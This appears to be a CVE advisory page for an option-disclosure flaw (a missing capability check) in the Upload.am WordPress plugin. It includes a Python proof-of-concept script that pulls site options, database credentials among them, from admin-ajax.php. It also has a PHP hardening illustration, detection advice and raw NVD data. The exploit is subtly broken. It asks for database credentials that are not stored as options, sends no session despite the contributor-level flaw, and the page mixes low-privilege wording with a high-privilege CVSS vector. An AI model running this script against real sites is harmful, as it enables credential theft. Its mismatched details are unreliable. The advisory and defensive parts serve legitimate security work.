Security Vulnerability Report
CVE-2025-12630 CVSS 4.9 MEDIUM

CVE-2025-12630

Published: 2025-12-02 16:15:54
Last Modified: 2026-04-15 00:35:42

Description

The Upload.am WordPress plugin before 1.0.1 is vulnerable to arbitrary option disclosure due to a missing capability check on its AJAX request handler, allowing low-privileged authenticated users such as contributors to view site options.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Upload.am WordPress plugin < 1.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12630 PoC - Upload.am WordPress Plugin Option Disclosure
# Affected: Upload.am plugin < 1.0.1
import requests
import sys

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress-site.com'

# Target options to retrieve
options_to_exfiltrate = [
    'siteurl', 'home', 'blogname', 'admin_email',
    'db_host', 'db_name', 'db_user', 'db_password', 'table_prefix'
]


def exploit_option_disclosure(target_url, option_name):
    """
    Exploit the missing capability check in Upload.am plugin
    to retrieve arbitrary WordPress options
    """
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    # Craft the AJAX request that exploits the vulnerability.
    # Note: the advisory describes a contributor-level issue; as written this
    # request carries no WordPress session, so it only exercises the handler
    # as an unauthenticated caller.
    data = {
        'action': 'upload_am_get_option',  # Plugin's AJAX action
        'option_name': option_name
    }
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        if response.status_code == 200:
            return response.text
    except requests.RequestException as e:
        return f"Error: {e}"
    return None


print(f"[*] Targeting: {target}")
print(f"[*] Exploiting CVE-2025-12630...\n")
for option in options_to_exfiltrate:
    result = exploit_option_disclosure(target, option)
    if result and 'Error' not in str(result):
        print(f"[+] Option: {option}")
        print(f"    Value: {result[:200]}...\n")
print("[*] Exploitation complete")
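The root cause named in the description is a missing capability check on the plugin's AJAX handler. The following PHP is an added illustration of that defect class and its fix, not the Upload.am plugin's own code: the action name `upload_am_get_option` is taken from the PoC above, while the handler bodies, the nonce action `upload_am_nonce` and the allowlisted option names are hypothetical. It shows the vulnerable shape (any logged-in role can read any option by name) next to a hardened handler that adds a nonce check, a `manage_options` capability check and an option allowlist.

```php
<?php
// Added illustration, not the Upload.am plugin's code. The action name
// 'upload_am_get_option' comes from the PoC on this page; the function
// bodies, 'upload_am_nonce' and the allowlisted option names are hypothetical.

// --- Vulnerable pattern: the "missing capability check" the advisory describes ---
// wp_ajax_* hooks fire for every authenticated user, including contributors,
// so without a capability check any logged-in account can read any option.
function upload_am_get_option_vulnerable() {
    $name = isset( $_POST['option_name'] ) ? sanitize_key( $_POST['option_name'] ) : '';
    wp_send_json_success( get_option( $name ) );
}

// --- Hardened pattern ---
function upload_am_get_option_hardened() {
    // 1. Nonce: rejects forged cross-site requests (dies with 403 on failure).
    check_ajax_referer( 'upload_am_nonce', 'nonce' );

    // 2. Capability: only users who may manage options may read them.
    //    This is the check whose absence causes the disclosure.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 3. Allowlist: even for administrators, expose only the options the
    //    plugin itself needs, never an arbitrary caller-chosen option name.
    $allowed = array( 'upload_am_api_endpoint', 'upload_am_max_size' ); // hypothetical names
    $name    = isset( $_POST['option_name'] ) ? sanitize_key( $_POST['option_name'] ) : '';
    if ( ! in_array( $name, $allowed, true ) ) {
        wp_send_json_error( array( 'message' => 'unknown option' ), 400 );
    }

    wp_send_json_success( get_option( $name ) );
}

// Registering under wp_ajax_ (authenticated only) rather than wp_ajax_nopriv_
// is not sufficient on its own: the vulnerable handler above would still be
// reachable by any contributor. Register the hardened one.
add_action( 'wp_ajax_upload_am_get_option', 'upload_am_get_option_hardened' );
```

For detection on a site that cannot update yet, POST requests to `wp-admin/admin-ajax.php` with `action=upload_am_get_option` from sessions that are not administrators are the signal to alert on; a nonce failure will surface as a 403 from `check_ajax_referer` once the hardened handler is in place.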

References

https://wpscan.com/vulnerability/531537f1-5547-4b0f-9e11-3f8a0b2589f5/

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12630", "sourceIdentifier": "[email protected]", "published": "2025-12-02T16:15:53.720", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Upload.am WordPress plugin before 1.0.1 is vulnerable to arbitrary option disclosure due to a missing capability check on its AJAX request handler, allowing users such as contributor to view site options."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "references": [{"url": "https://wpscan.com/vulnerability/531537f1-5547-4b0f-9e11-3f8a0b2589f5/", "source": "[email protected]"}]}}